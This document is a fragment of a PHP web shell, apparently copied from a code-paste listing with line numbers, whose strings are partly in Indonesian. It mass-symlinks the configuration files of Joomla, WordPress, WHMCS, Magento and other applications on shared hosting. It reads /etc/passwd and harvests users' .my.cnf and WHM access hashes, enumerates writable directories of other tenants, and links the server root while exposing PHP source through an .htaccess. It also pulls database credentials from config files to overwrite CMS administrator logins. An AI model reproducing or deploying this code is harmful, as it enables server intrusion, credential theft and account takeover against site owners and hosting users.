symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  665. $file = "Dav_config/vhost.cin";
  666. $handle = fopen($file ,"w+");
  667. fwrite($handle ,base64_decode($vhost));
  668. fclose($handle);
  669. chmod($file, 0755);
  670. if(exe("cd Dav_config && ./vhost.cin")) {
  671. echo "<center><a href='$link_config/Dav_config'><font color=white>Done</font></a></center>";
  672. } else {
  673. echo "<center><a href='$link_config/Dav_config/vhost.cin'><font color=white>Done</font></a></center>";
  674. }
  675.  
  676. } else {
  677. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  678. while($passwd = fgets($etc)) {
  679. if($passwd == "" || !$etc) {
  680. echo "<font color=red>Can't read /etc/passwd</font>";
  681. } else {
  682. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  683. foreach($user_config[1] as $user_idx) {
  684. $user_config_dir = "/home/$user_idx/public_html/";
  685. if(is_readable($user_config_dir)) {
  686. $grab_config = array(
  687. "/home/$user_idx/.my.cnf" => "cpanel",
  688. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  689. "$user_config_dir/po-content/config.php" => "Popoji",
  690. "$user_config_dir/vdo_config.php" => "Voodoo",
  691. "$user_config_dir/koneksi.php" => "web-default",
  692. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  693. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  694. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  695. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  696. "$user_config_dir/whm/configuration.php" => "WHMCS",
  697. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  698. "$user_config_dir/forum/config.php" => "phpBB",
  699. "$user_config_dir/sites/default/settings.php" => "Drupal",
  700. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  701. "$user_config_dir/app/etc/local.xml" => "Magento",
  702. "$user_config_dir/joomla/configuration.php" => "Joomla",
  703. "$user_config_dir/configuration.php" => "Joomla",
  704. "$user_config_dir/wp/wp-config.php" => "WordPress",
  705. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  706. "$user_config_dir/wp-config.php" => "WordPress",
  707. "$user_config_dir/admin/config.php" => "OpenCart",
  708. "$user_config_dir/slconfig.php" => "Sitelok",
  709. "$user_config_dir/application/config/database.php" => "Ellislab");
  710. foreach($grab_config as $config => $nama_config) {
  711. $ambil_config = file_get_contents($config);
  712. if($ambil_config == '') {
  713. } else {
  714. $file_config = fopen("Dav_config/$user_idx-$nama_config.txt","w");
  715. fputs($file_config,$ambil_config);
  716. }
  717. }
  718. }
  719. }
  720. }
  721. }
  722. echo "<center><a href='?dir=$dir/Dav_config'><font color=white>Done</font></a></center>";
  723. }
  724. } elseif($_GET['do'] == 'jumping') {
  725. $i = 0;
  726. echo "<div class='margin: 5px auto;'>";
  727. if(preg_match("/hsphere/", $dir)) {
  728. $urls = explode("\r\n", $_POST['url']);
  729. if(isset($_POST['jump'])) {
  730. echo "<pre>";
  731. foreach($urls as $url) {
  732. $url = str_replace(array("http://","www."), "", strtolower($url));
  733. $etc = "/etc/passwd";
  734. $f = fopen($etc,"r");
  735. while($gets = fgets($f)) {
  736. $pecah = explode(":", $gets);
  737. $user = $pecah[0];
  738. $dir_user = "/hsphere/local/home/$user";
  739. if(is_dir($dir_user) === true) {
  740. $url_user = $dir_user."/".$url;
  741. if(is_readable($url_user)) {
  742. $i++;
  743. $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  744. if(is_writable($url_user)) {
  745. $jrw = "[<font color=white>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  746. }
  747. echo $jrw."<br>";
  748. }
  749. }
  750. }
  751. }
  752. if($i == 0) {
  753. } else {
  754. echo "<br>Total ada ".$i." Kamar di ".$ip;
  755. }
  756. echo "</pre>";
  757. } else {
  758. echo '<center>
  759. <form method="post">
  760. List Domains: <br>
  761. <textarea name="url" style="width: 500px; height: 250px;">';
  762. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  763. while($getss = fgets($fp)) {
  764. echo $getss;
  765. }
  766. echo '</textarea><br>
  767. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  768. </form></center>';
  769. }
  770. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  771. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  772. $urls = explode("\r\n", $_POST['url']);
  773. if(isset($_POST['jump'])) {
  774. echo "<pre>";
  775. foreach($urls as $url) {
  776. $url = str_replace("www.", "", $url);
  777. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  778. if(is_dir($web_vh) === true) {
  779. if(is_readable($web_vh)) {
  780. $i++;
  781. $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  782. if(is_writable($web_vh)) {
  783. $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  784. }
  785. echo $jrw."<br>";
  786. }
  787. }
  788. }
  789. if($i == 0) {
  790. } else {
  791. echo "<br>Total ada ".$i." Kamar di ".$ip;
  792. }
  793. echo "</pre>";
  794. } else {
  795. echo '<center>
  796. <form method="post">
  797. List Domains: <br>
  798. <textarea name="url" style="width: 500px; height: 250px;">';
  799. bing("ip:$ip");
  800. echo '</textarea><br>
  801. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  802. </form></center>';
  803. }
  804. } else {
  805. echo "<pre>";
  806. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  807. while($passwd = fgets($etc)) {
  808. if($passwd == '' || !$etc) {
  809. echo "<font color=red>Can't read /etc/passwd</font>";
  810. } else {
  811. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  812. foreach($user_jumping[1] as $user_idx_jump) {
  813. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  814. if(is_readable($user_jumping_dir)) {
  815. $i++;
  816. $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  817. if(is_writable($user_jumping_dir)) {
  818. $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  819. }
  820. echo $jrw;
  821. if(function_exists('posix_getpwuid')) {
  822. $domain_jump = file_get_contents("/etc/named.conf");
  823. if($domain_jump == '') {
  824. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  825. } else {
  826. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  827. foreach($domains_jump[1] as $dj) {
  828. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  829. $user_jumping_url = $user_jumping_url['name'];
  830. if($user_jumping_url == $user_idx_jump) {
  831. echo " => ( <u>$dj</u> )<br>";
  832. break;
  833. }
  834. }
  835. }
  836. } else {
  837. echo "<br>";
  838. }
  839. }
  840. }
  841. }
  842. }
  843. if($i == 0) {
  844. } else {
  845. echo "<br>Total ada ".$i." Kamar di ".$ip;
  846. }
  847. echo "</pre>";
  848. }
  849. echo "</div>";
  850. } elseif($_GET['do'] == 'symlink') {
  851. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  852. $d0mains = @file("/etc/named.conf");
  853. ##httaces
  854. if($d0mains){
  855. @mkdir("Dav_Symlink",0777);
  856. @chdir("Dav_Symlink");
  857. @exe("ln -s / root");
  858. $file3 = 'Options Indexes FollowSymLinks
  859. DirectoryIndex 0xaN0n.htm
  860. AddType text/plain .php
  861. AddHandler text/plain .php
  862. Satisfy Any';
  863. $fp3 = fopen('.htaccess','w');
  864. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  865. echo "
  866. <table align=center border=1 style='width:60%;border-color:#333333;'>
  867. <tr>
  868. <td align=center><font size=2>S. No.</font></td>
  869. <td align=center><font size=2>Domains</font></td>
  870. <td align=center><font size=2>Users</font></td>
  871. <td align=center><font size=2>Symlink</font></td>
  872. </tr>";
  873. $dcount = 1;
  874. foreach($d0mains as $d0main){
  875. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  876. flush();
  877. if(strlen(trim($domains[1][0])) > 2){
  878. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  879. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  880. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  881. <td>".$user['name']."</td>
  882. <td><a href='$full/Dav_Symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  883. flush();
  884. $dcount++;}}}
  885. echo "</table>";
  886. }else{
  887. $TEST=@file('/etc/passwd');
  888. if ($TEST){
  889. @mkdir("Dav_Symlink",0777);
  890. @chdir("Dav_Symlink");
  891. exe("ln -s / root");
  892. $file3 = 'Options Indexes FollowSymLinks
  893. DirectoryIndex 0xaN0n.htm
  894. AddType text/plain .php
  895. AddHandler text/plain .php
  896. Satisfy Any';
  897. $fp3 = fopen('.htaccess','w');
  898. $fw3 = fwrite($fp3,$file3);
  899. @fclose($fp3);
  900. echo "
  901. <table align=center border=1><tr>
  902. <td align=center><font size=3>S. No.</font></td>
  903. <td align=center><font size=3>Users</font></td>
  904. <td align=center><font size=3>Symlink</font></td></tr>";
  905. $dcount = 1;
  906. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  907. while(!feof($file)){
  908. $s = fgets($file);
  909. $matches = array();
  910. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  911. $matches = str_replace("home/","",$matches[1]);
  912. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  913. continue;
  914. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  915. <td align=center><font class=txt>" . $matches . "</td>";
  916. echo "<td align=center><font class=txt><a href=$full/Dav_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  917. $dcount++;}fclose($file);
  918. echo "</table>";}else{if($os != "Windows"){@mkdir("Dav_Symlink",0777);@chdir("Dav_Symlink");@exe("ln -s / root");$file3 = '
  919. Options Indexes FollowSymLinks
  920. DirectoryIndex 0xaN0n.htm
  921. AddType text/plain .php
  922. AddHandler text/plain .php
  923. Satisfy Any
  924. ';
  925. $fp3 = fopen('.htaccess','w');
  926. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  927. echo "
  928. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  929. <table align=center border=1><tr>
  930. <td align=center><font size=3>ID</font></td>
  931. <td align=center><font size=3>Users</font></td>
  932. <td align=center><font size=3>Symlink</font></td></tr>";
  933. $temp = "";$val1 = 0;$val2 = 1000;
  934. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  935. if ($uid)$temp .= join(':',$uid)."\n";}
  936. echo '<br/>';$temp = trim($temp);$file5 =
  937. fopen("test.txt","w");
  938. fputs($file5,$temp);
  939. fclose($file5);$dcount = 1;$file =
  940. fopen("test.txt", "r") or exit("Unable to open file!");
  941. while(!feof($file)){$s = fgets($file);$matches = array();
  942. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  943. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  944. continue;
  945. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  946. <td align=center><font class=txt>" . $matches . "</td>";
  947. echo "<td align=center><font class=txt><a href=$full/Dav_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  948. $dcount++;}
  949. fclose($file);
  950. echo "</table></div></center>";unlink("test.txt");
  951. } else
  952. echo "<center><font size=3>Cannot create Symlink</font></center>";
  953. }
  954. }
  955. } elseif($_GET['do'] == 'auto_edit_user') {
  956. if($_POST['hajar']) {
  957. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  958. echo "username atau password harus lebih dari 6 karakter";
  959. } else {
  960. $user_baru = $_POST['user_baru'];
  961. $pass_baru = md5($_POST['pass_baru']);
  962. $conf = $_POST['config_dir'];
  963. $scan_conf = scandir($conf);
  964. foreach($scan_conf as $file_conf) {
  965. if(!is_file("$conf/$file_conf")) continue;
  966. $config = file_get_contents("$conf/$file_conf");
  967. if(preg_match("/JConfig|joomla/",$config)) {
  968. $dbhost = ambilkata($config,"host = '","'");
  969. $dbuser = ambilkata($config,"user = '","'");
  970. $dbpass = ambilkata($config,"password = '","'");
  971. $dbname = ambilkata($config,"db = '","'");
  972. $dbprefix = ambilkata($config,"dbprefix = '","'");
  973. $prefix = $dbprefix."users";
  974. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  975. $db = mysql_select_db($dbname);
  976. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  977. $result = mysql_fetch_array($q);
  978. $id = $result['id'];
  979. $site = ambilkata($config,"sitename = '","'");
  980. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  981. echo "Config => ".$file_conf."<br>";
  982. echo "CMS => Joomla<br>";
  983. if($site == '') {
  984. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  985. } else {
  986. echo "Sitename => $site<br>";
  987. }
  988. if(!$update OR !$conn OR !$db) {
  989. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  990. } else {
  991. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  992. }
  993. mysql_close($conn);
  994. } elseif(preg_match("/WordPress/",$config)) {
  995. $dbhost = ambilkata($config,"DB_HOST', '","'");
  996. $dbuser = ambilkata($config,"DB_USER', '","'");
  997. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  998. $dbname = ambilkata($config,"DB_NAME', '","'");
  999. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1000. $prefix = $dbprefix."users";
  1001. $option = $dbprefix."options";
  1002. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1003. $db = mysql_select_db($dbname);
  1004. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1005. $result = mysql_fetch_array($q);
  1006. $id = $result[ID];
  1007. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1008. $result2 = mysql_fetch_array($q2);
  1009. $target = $result2[option_value];
  1010. if($target == '') {
  1011. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1012. } else {
  1013. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1014. }
  1015. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1016. echo "Config => ".$file_conf."<br>";
  1017. echo "CMS => Wordpress<br>";
  1018. echo $url_target;
  1019. if(!$update OR !$conn OR !$db) {
  1020. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1021. } else {
  1022. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1023. }
  1024. mysql_close($conn);
  1025. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1026. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1027. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1028. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1029. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1030. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1031. $prefix = $dbprefix."admin_user";
  1032. $option = $dbprefix."core_config_data";
  1033. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1034. $db = mysql_select_db($dbname);
  1035. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1036. $result = mysql_fetch_array($q);
  1037. $id = $result[user_id];
  1038. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1039. $result2 = mysql_fetch_array($q2);
  1040. $target = $result2[value];
  1041. if($target == '') {
  1042. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1043. } else {
  1044. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1045. }
  1046. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1047. echo "Config => ".$file_conf."<br>";
  1048. echo "CMS => Magento<br>";
  1049. echo $url_target;
  1050. if(!$update OR !$conn OR !$db) {
  1051. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1052. } else {
  1053. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1054. }
  1055. mysql_close($conn);
  1056. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1057. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1058. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1059. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1060. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1061. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1062. $prefix = $dbprefix."user";
  1063. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1064. $db = mysql_select_db($dbname);
  1065. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1066. $result = mysql_fetch_array($q);
  1067. $id = $result[user_id];
  1068. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1069. if($target == '') {
  1070. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1071. } else {
  1072. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1073. }
  1074. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1075. echo "Config => ".$file_conf."<br>";
  1076. echo "CMS => OpenCart<br>";
  1077. echo $url_target;
  1078. if(!$update OR !$conn OR !$db) {
  1079. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1080. } else {
  1081. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1082. }
  1083. mysql_close($conn);
  1084. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1085. $dbhost = ambilkata($config,'server = "','"');
  1086. $dbuser = ambilkata($config,'username = "','"');
  1087. $dbpass = ambilkata($config,'password = "','"');
  1088. $dbname = ambilkata($config,'database = "','"');
  1089. $prefix = "users";
  1090. $option = "identitas";
  1091. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1092. $db = mysql_select_db($dbname);
  1093. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1094. $result = mysql_fetch_array($q);
  1095. $target = $result[alamat_website];
  1096. if($target == '') {
  1097. $target2 = $result[url];
  1098. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1099. if($target2 == '') {
  1100. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1101. } else {
  1102. $cek_login3 = file_get_contents("$target2/adminweb/");
  1103. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1104. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1105. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1106. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1107. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1108. } else {
  1109. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1110. }
  1111. }
  1112. } else {
  1113. $cek_login = file_get_contents("$target/adminweb/");
  1114. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1115. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1116. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1117. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1118. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1119. } else {
  1120. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1121. }
  1122. }
